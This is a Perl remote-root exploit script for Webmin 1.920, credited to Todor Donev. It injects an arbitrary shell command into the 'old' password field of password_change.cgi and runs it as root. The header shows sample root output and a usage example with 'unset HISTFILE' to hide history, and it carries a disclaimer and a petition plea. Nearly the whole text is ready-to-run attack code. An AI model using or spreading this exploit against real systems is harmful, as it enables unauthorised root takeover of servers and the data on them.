Webmin version 1.920 remote root exploit.
e3174202504ae321de08a1dd89c21438#!/usr/bin/perl -w
#
# Webmin 1.920 Remote Root Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Disclaimer:
# This or previous programs are for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The other exploits not works for me..
#
# Tested on CentOS
#
# [test@localhost ~]$ perl webmin.pl
# [ Webmin 1.920 Remote Root Exploit
# [ ==========================================================
# [ First time released at Defcon
# [ Thank you guys, for all..
# [ Exploit by: Todor Donev
# [ <[email protected]>
# [ ==========================================================
# [ Usage: webmin.pl <host> <port> <command>
# [ e.g. webmin.pl localhost 10000 "unset HISTFILE;uname -a;id;uptime"
#
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
# [test@localhost ~]$
#
#
#
# ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !!
#
# Guys, please give a star to https://github.com/otvorete/petition
# to support the cause of the Bulgarian Hackers (Developers) Community.
# We want to makes our Electronic Government more securе, transparent
# and reliable. For this reason we want from our government to open
# the source codes of the applications. So support us with a star,
# please..
#
# Special thanks to Konstantin Spirov that starting the cause!!
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
my $host = shift || 'localhost';
my $port = shift || '10000';
my $cmd = shift || 'uname -a;id;uptime';
$cmd =~ s/\|/\;/g;
print "[ Webmin 1.920 Remote Root Exploit\n";
print "[ ==========================================================\n";
print "[ First time released at Defcon\n";
print "[ Thank you guys, for all..\n";
print "[ Exploit by: Todor Donev\n";
print "[ <todor.donev\@gmail.com>\n";
print "[ ==========================================================\n";
print "[ Usage: $0 <host> <port> <command>\n";
print "[ e.g. $0 localhost 10000 \"unset HISTFILE;uname -a;id;uptime\"\n";
my $browser = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 });
$browser->timeout(5);
$browser->agent('Mozilla/5.0');
my $target = "https://".$host.":".$port."/password_change.cgi";
my $request = HTTP::Request->new (
POST => $target,
[ Content_Type => "application/x-www-form-urlencoded" ,
Referer => "https://".$host.":".$port."/session_login.cgi" ],
"user=wheel&pam=&expired=2&old=id|echo OWNED;$cmd;echo OWNED&new1=wheel&new2=wheel");
$request->header("Cookie" => "redirect=1; testing=1; sid=x; sessiontest=1;");
my $content = $browser->request($request)->as_string();
print $1 and exit if ($content =~ m/OWNED(.*?)OWNED/ms);
print "[ Exploit Failed!\n" and exit if (not $content =~ m/OWNED(.*?)OWNED/ms);